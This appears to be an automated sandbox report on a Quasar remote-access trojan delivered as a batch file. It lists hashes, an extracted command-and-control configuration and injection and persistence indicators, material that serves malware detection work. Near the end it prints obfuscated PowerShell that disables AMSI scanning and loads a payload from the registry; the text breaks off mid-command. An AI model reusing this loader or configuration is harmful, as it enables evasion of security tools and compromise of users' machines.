Analysis
-
max time kernel
300s -
max time network
293s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-05-2024 13:42
Static task
static1
Behavioral task
behavioral1
Sample
New1.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
New1.bat
Resource
win10v2004-20240508-en
General
-
Target
New1.bat
-
Size
1002KB
-
MD5
f6d5bfaee8a55ff72c7b453fda066d62
-
SHA1
7d737d53013990e5d05076b7206e43eb4793fc7f
-
SHA256
3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
-
SHA512
e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
-
SSDEEP
12288:NzPPeJOTZMGuIl99I2FxGwvYXDSeengmfn5tKvy0H5JbcGfRZIJZ32hxnQxCGaF9:NDeYum99IGP8f2rRO5JFPIJZ8GaF8XmB
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
3.1.5
Video
runderscore00-25501.portmap.host:25501
$Sxr-oWTh3ZS9htfe80iIl5
-
encryption_key
zK8u0rpHf4TJzGf65Flt
-
install_name
Win11.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Windows 11 Boot
-
subdirectory
Win11
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/4964-22-0x00000000089D0000-0x0000000008AC2000-memory.dmp family_quasar behavioral3/memory/3448-79-0x0000000008E60000-0x0000000008ECC000-memory.dmp family_quasar behavioral3/memory/2888-98-0x0000000000900000-0x000000000096C000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\New.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1916 created 640 1916 powershell.EXE winlogon.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 3448 powershell.exe 5 3448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4964 powershell.exe 2404 powershell.exe 3448 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
Processes:
Install.exeNew.exepid process 4872 Install.exe 2888 New.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Drops file in System32 directory 13 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1916 set thread context of 1864 1916 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 53 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exewmiprvse.exepid process 4964 powershell.exe 4964 powershell.exe 2404 powershell.exe 2404 powershell.exe 3448 powershell.exe 3448 powershell.exe 1916 powershell.EXE 1916 powershell.EXE 1916 powershell.EXE 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 3448 powershell.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 3448 powershell.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 3448 powershell.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 2968 wmiprvse.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 3448 powershell.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe 1864 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3228 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeIncreaseQuotaPrivilege 2404 powershell.exe Token: SeSecurityPrivilege 2404 powershell.exe Token: SeTakeOwnershipPrivilege 2404 powershell.exe Token: SeLoadDriverPrivilege 2404 powershell.exe Token: SeSystemProfilePrivilege 2404 powershell.exe Token: SeSystemtimePrivilege 2404 powershell.exe Token: SeProfSingleProcessPrivilege 2404 powershell.exe Token: SeIncBasePriorityPrivilege 2404 powershell.exe Token: SeCreatePagefilePrivilege 2404 powershell.exe Token: SeBackupPrivilege 2404 powershell.exe Token: SeRestorePrivilege 2404 powershell.exe Token: SeShutdownPrivilege 2404 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeSystemEnvironmentPrivilege 2404 powershell.exe Token: SeRemoteShutdownPrivilege 2404 powershell.exe Token: SeUndockPrivilege 2404 powershell.exe Token: SeManageVolumePrivilege 2404 powershell.exe Token: 33 2404 powershell.exe Token: 34 2404 powershell.exe Token: 35 2404 powershell.exe Token: 36 2404 powershell.exe Token: SeIncreaseQuotaPrivilege 2404 powershell.exe Token: SeSecurityPrivilege 2404 powershell.exe Token: SeTakeOwnershipPrivilege 2404 powershell.exe Token: SeLoadDriverPrivilege 2404 powershell.exe Token: SeSystemProfilePrivilege 2404 powershell.exe Token: SeSystemtimePrivilege 2404 powershell.exe Token: SeProfSingleProcessPrivilege 2404 powershell.exe Token: SeIncBasePriorityPrivilege 2404 powershell.exe Token: SeCreatePagefilePrivilege 2404 powershell.exe Token: SeBackupPrivilege 2404 powershell.exe Token: SeRestorePrivilege 2404 powershell.exe Token: SeShutdownPrivilege 2404 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeSystemEnvironmentPrivilege 2404 powershell.exe Token: SeRemoteShutdownPrivilege 2404 powershell.exe Token: SeUndockPrivilege 2404 powershell.exe Token: SeManageVolumePrivilege 2404 powershell.exe Token: 33 2404 powershell.exe Token: 34 2404 powershell.exe Token: 35 2404 powershell.exe Token: 36 2404 powershell.exe Token: SeIncreaseQuotaPrivilege 2404 powershell.exe Token: SeSecurityPrivilege 2404 powershell.exe Token: SeTakeOwnershipPrivilege 2404 powershell.exe Token: SeLoadDriverPrivilege 2404 powershell.exe Token: SeSystemProfilePrivilege 2404 powershell.exe Token: SeSystemtimePrivilege 2404 powershell.exe Token: SeProfSingleProcessPrivilege 2404 powershell.exe Token: SeIncBasePriorityPrivilege 2404 powershell.exe Token: SeCreatePagefilePrivilege 2404 powershell.exe Token: SeBackupPrivilege 2404 powershell.exe Token: SeRestorePrivilege 2404 powershell.exe Token: SeShutdownPrivilege 2404 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeSystemEnvironmentPrivilege 2404 powershell.exe Token: SeRemoteShutdownPrivilege 2404 powershell.exe Token: SeUndockPrivilege 2404 powershell.exe Token: SeManageVolumePrivilege 2404 powershell.exe Token: 33 2404 powershell.exe Token: 34 2404 powershell.exe Token: 35 2404 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3448 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exeNew.exepowershell.EXEdllhost.exedescription pid process target process PID 1096 wrote to memory of 4964 1096 cmd.exe powershell.exe PID 1096 wrote to memory of 4964 1096 cmd.exe powershell.exe PID 1096 wrote to memory of 4964 1096 cmd.exe powershell.exe PID 4964 wrote to memory of 2404 4964 powershell.exe powershell.exe PID 4964 wrote to memory of 2404 4964 powershell.exe powershell.exe PID 4964 wrote to memory of 2404 4964 powershell.exe powershell.exe PID 4964 wrote to memory of 2700 4964 powershell.exe WScript.exe PID 4964 wrote to memory of 2700 4964 powershell.exe WScript.exe PID 4964 wrote to memory of 2700 4964 powershell.exe WScript.exe PID 2700 wrote to memory of 4160 2700 WScript.exe cmd.exe PID 2700 wrote to memory of 4160 2700 WScript.exe cmd.exe PID 2700 wrote to memory of 4160 2700 WScript.exe cmd.exe PID 4160 wrote to memory of 3448 4160 cmd.exe powershell.exe PID 4160 wrote to memory of 3448 4160 cmd.exe powershell.exe PID 4160 wrote to memory of 3448 4160 cmd.exe powershell.exe PID 3448 wrote to memory of 4872 3448 powershell.exe Install.exe PID 3448 wrote to memory of 4872 3448 powershell.exe Install.exe PID 3448 wrote to memory of 4872 3448 powershell.exe Install.exe PID 3448 wrote to memory of 2888 3448 powershell.exe New.exe PID 3448 wrote to memory of 2888 3448 powershell.exe New.exe PID 3448 wrote to memory of 2888 3448 powershell.exe New.exe PID 2888 wrote to memory of 1392 2888 New.exe SCHTASKS.exe PID 2888 wrote to memory of 1392 2888 New.exe SCHTASKS.exe PID 2888 wrote to memory of 1392 2888 New.exe SCHTASKS.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1916 wrote to memory of 1864 1916 powershell.EXE dllhost.exe PID 1864 wrote to memory of 640 1864 dllhost.exe winlogon.exe PID 1864 wrote to memory of 700 1864 dllhost.exe lsass.exe PID 1864 wrote to memory of 1000 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 560 1864 dllhost.exe dwm.exe PID 1864 wrote to memory of 900 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1028 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1036 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1088 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1148 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1244 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1252 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1328 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1372 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1472 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1544 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1612 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1636 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1736 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1744 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1780 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1856 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1888 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1972 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1984 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1520 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 1828 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 2092 1864 dllhost.exe spoolsv.exe PID 1864 wrote to memory of 2264 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 2416 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 2500 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 2508 1864 dllhost.exe svchost.exe PID 1864 wrote to memory of 2556 1864 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{62580871-809d-4acd-8bc6-8c7116bf403e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FveygWzWfzez{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RgHMHfomuIygpT,[Parameter(Position=1)][Type]$reztmTlFgm)$PCRfYmpIEQB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+''+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+'e'+''+[Char](109)+'o'+'r'+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+'e'+'g'+[Char](97)+'teT'+[Char](121)+''+'p'+'e','Cl'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,S'+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PCRfYmpIEQB.DefineConstructor('RTS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+'N'+'a'+'m'+''+[Char](101)+',H'+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+'m'+''+'e'+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$PCRfYmpIEQB.DefineMethod('In'+'v'+''+[Char](111)+'k'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+''+','+''+[Char](72)+'id'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+'g'+''+','+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$reztmTlFgm,$RgHMHfomuIygpT).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $PCRfYmpIEQB.CreateType();}$mLEOSOvHxyzZT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$XSODmByomeFYhI=$mLEOSOvHxyzZT.GetMethod('Ge'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JlGxeElggKGGKDqObkC=FveygWzWfzez @([String])([IntPtr]);$FTxdBemZQCPbOlMLVcPtpl=FveygWzWfzez @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GZpHqajJJKr=$mLEOSOvHxyzZT.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$oLaaaTtPeZmmxW=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object]('L'+'o'+'a'+'d'+''+'L'+''+'i'+''+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$DMBmYJdimSNRoymQi=$XSODmByomeFYhI.Invoke($Null,@([Object]$GZpHqajJJKr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$RZPumCE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oLaaaTtPeZmmxW,$JlGxeElggKGGKDqObkC).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+[Char](100)+'ll');$MDAhfOyPFUPYWlZEr=$XSODmByomeFYhI.Invoke($Null,@([Object]$RZPumCE,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$puXAHIgegY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,4,[ref]$puXAHIgegY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MDAhfOyPFUPYWlZEr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DMBmYJdimSNRoymQi,$FTxdBemZQCPbOlMLVcPtpl).Invoke($MDAhfOyPFUPYWlZEr,[uint32]8,0x20,[ref]$puXAHIgegY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83